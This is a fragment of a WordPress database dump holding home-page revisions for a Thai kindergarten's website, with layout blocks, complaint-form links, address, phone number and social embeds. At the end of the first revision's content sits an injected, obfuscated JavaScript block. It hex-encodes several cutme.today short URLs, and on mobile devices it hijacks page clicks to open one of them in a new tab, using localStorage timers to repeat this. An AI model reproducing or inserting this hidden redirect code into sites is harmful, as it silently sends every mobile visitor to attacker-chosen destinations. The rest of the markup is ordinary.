{\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:54:36','2024-08-30 02:54:36','',19,'http://watprato.ssk.in.th/?p=291',0,'revision','',0),
(292,2,'2024-08-30 10:04:52','2024-08-30 03:04:52','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn 